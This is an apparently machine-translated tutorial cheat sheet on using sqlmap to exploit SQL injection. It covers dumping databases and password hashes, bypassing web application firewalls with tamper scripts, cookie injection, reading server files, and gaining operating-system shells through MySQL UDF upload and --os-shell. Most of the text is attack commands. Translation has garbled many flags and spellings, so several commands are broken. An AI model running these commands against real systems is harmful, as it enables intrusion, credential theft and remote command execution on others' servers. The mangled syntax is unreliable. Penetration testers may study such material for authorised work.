Sqlmap actual battle-1


Sqlmap actual battle-1

Detect and utilize SQL injection

Python2 sqlmap. Py - U "[url] SQL injection point]" [-- batch]

--batch: automatically select the default selection of sqlmap

Finding goals
Sqlmap actual battle-1

Sqlmap actual battle-1

Direct connection to database

python2 sqlmap.py -d "mysql://[user]:[password]@[ip]:[port]/[dbs]" --banner --dbs --users

Sqlmap actual battle-1

Database operation parameters:

--dbs: enumerate database information

--current-db: current database name

--current-user: current database user

--users: list all users in DBMS

--passwords: list all accounts and passwords in DBMA

Sqlmap actual battle-1

-D [databases] …: specify the database name to operate on the database

-T [tables]: specify the data table and operate on it

-C [columns]: specify the column name to operate on

--tables: enumerate database table information

--columns: enumerates column name information for a data table

--schema: enumerate database structures

--count: enumerates the number of items in a package


Combined operation can realize the concrete operation of database

#List all tables in the Library:
-D [database name] - tables
#To list the field names in a table:
-D [library name] - t [table name] - columns

--dump: export data

--start: Specifies the starting line

--stop: Specifies the end row

#Export all current data table data
-D [library name] - t [table name] - C [field name] - count -- dump
#Export part (range) datasheet data
-D [library name] - t [table name] - C [field name] - start {*} -- stop {*} -- dump

Sqlmap actual battle-1

Sqlmap skills

Using annotation to bypass WAF injection


return match.group().replace(word, "/*!0%s" % word)
return match.group().replace(word,"/*!50000%s*/" % word)


Sqlmap implementation injection:

sqlmap.py -u [url] --tamper ./tamper/halfversionecdmoreckeywords.py

sqlmap.py -u [url] --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py

URL Rewrite SQL injection test

value1To test parameters, just add * sign, sqlmap will testvalue1Whether the position can be injected

Enumerate and crack password hash

When the user has the right to view the user password,--passwordWill automatically connect and crack the hash to return the result

Crawling the target

--batch --crawl=3Crawl site from destination URL

Using hex to evade encoding causes loss

sqlmap.py -u [url] --banner --hex -v 3 --parse-errors

--parse-errors: parse and display response database error information

Imitating mobile access target

sqlmap.py -u [url] --banner --mobile

--mobile: set a mobile terminal “user agent” imitating mobile phone access URL

Intelligent judgment test

sqlmap.py -u [url] --bath --smart

--smart: quickly determine the injection point as the error reporting injection point

Injection test with burp

Save burp’s packet capturing record in burp — options — “proxy. Requests”

sqlmap.py -r burp***.txt

Load HTTP request from packet capturing record

sqlmap.py -u [url] --data "[*……*]"

Auto fill in form

sqlmap.py -u [url] --forms [……]

--forms: parsing and testing target URL forms

Read Linux files

sqlmap.py -u [url] --file [url]

Delayed injection

sqlmap.py -u [url] --technique -T --current-user
sqlmap.py -u [url] --delay 0.5
Sqlmap.py - u [url] - safe freq ා request twice

Burp grabs packets and uses sqlmap injection

Sqlmap.py - R * * *. Txt - P [parameters to be injected]

-p: specify injection parameters

Sqlmap cookies injection

By default, sqlmap only supports the injection of get / post parameters.-levelIf the value of the parameter is greater than or equal to 2, the cookie parameter will be detected. If it is greater than 3, the user agent and the referer will be checked.

sqlmap.py -u [url] --cookie [value] --level 3
sqlmap.py -u [url] --cookie [value] --level 3 --tables
Sqlmap.py - u [url] - Cookie [value] - Level 3 - t [table name] - coiumns

MySQL raise power

Connect and open an interactive shell

sqlmap.py -d "mysql://[user]:[password]@[ip]:[port]/[dbs]" --sql-shell

Upload lib > mysqludf > sys to the plugin directory

sqlmap.py -d "mysql://[user]:[password]@[ip]:[port]/[dbs]"

Execute shell command

Sqlmap. Py - u [url] - OS CMD = [^] -- execute CMD command (win environment)
Sqlmap. Py - u [url] - OS shell = [^] ා build interactive shell